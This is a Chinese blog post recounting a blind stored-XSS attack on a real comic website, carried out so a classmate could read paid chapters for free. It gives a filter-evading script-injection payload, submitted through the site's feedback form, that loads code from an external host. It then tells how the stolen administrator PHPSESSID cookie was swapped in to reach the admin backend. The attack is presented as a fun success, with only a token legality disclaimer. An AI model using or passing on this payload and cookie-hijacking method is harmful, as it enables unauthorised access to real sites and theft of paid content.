第一次实战：XX漫画的XSS盲打

XSS盲打

盲打是一种惯称的说法，就是不知道有没有XSS漏洞存在的情况下，不顾一切的输入XSS代码在留言啊投诉窗口啊之类的地方，尽可能多的尝试XSS的语句，就叫盲打。一句话，就是干，往死里使劲干。

Interesting，哦，不对，Disgusting的发现

（竟然有这种荼毒人们思想的坏东西。。。不看不看）

但我同学看的是欲罢不能、血脉喷张。

幸好后面章节要充值。。。

他说：“这不好使，师哥告诉过我们‘能白嫖绝不充钱’。”

那行吧，帮他一下，方便他人也是方便自己

让我看看个人设置

点开问题反馈

输入XSS 语句：

</tExtArEa>'"><sCRiPt sRC=https://。。。.com/。。。></sCrIpT>

然后提交，等待管理员看到，就有可能触发哦吼吼吼！

但接下来需要漫长的等待

（这里说一下为什么不去免费网站：因为免费的话管理员可能不会常来，我还得写今周的学习报告。。。(=_=)）

一发入魂

比较幸运，前天发的XSS，今天就收到了信息，在XSS后台就看到了打中消息，让我们访问后台，替换cookie进入。（替换PHPSESSID的value即可。）

进入后台。

白嫖开始！

请记住：互联网并非法外之地！

请记住：互联网并非法外之地！

最新文章

1. python单线程爬虫code
2. KnockOut.js入门示例详解
3. java进程性能分析步骤-超越昨天的自己系列(11)
4. [LeetCode] Edit Distance（很好的DP）
5. 在Linux下写一个简单的驱动程序
6. [设计模式] 20 状态模式 State Pattern
7. 指针和引用的比较（P105）
8. jsoi2015 R2——滚粗记
9. 【Android 复习】：从Activity中返回数据
10. Transparent Application Failover 透明应用切换
11. poj 3070 Fibonacci 矩阵快速幂
12. Linux - RAID和LVM
13. python excel写入及追加写入
14. nginx+fastCGI
15. python爬百度文库课件
16. Educational Codeforces Round 61 C 枚举 + 差分前缀和
17. Ext JS isField为空或不是对象问题的解决
18. ionic android - Unable to start the daemon process. Could not reserve enough space for 2097152KB object heap
19. Page Object设计模式（项目整体结构）
20. LeetCode 第 231 题 (Power of Two)

热门文章

1. python通过sha1和base64生成签名
2. Jmeter 学习笔记 1 - Logic Controller -组织执行场景
3. python3中文件/IO编程
4. 🏆【Java技术专区】「探针Agent专题」Java Agent探针的技术介绍（1）
5. yum 卸载
6. SpringBoot 默认json解析器详解和字段序列化自定义
7. SQL Server添加字段语法
8. 数据库比对工具SQL(表、字段、触发器、索引、视图、存储过程)
9. netty系列之:使用POJO替代buf
10. 小白学习Vue第五天(v-model实用的地方）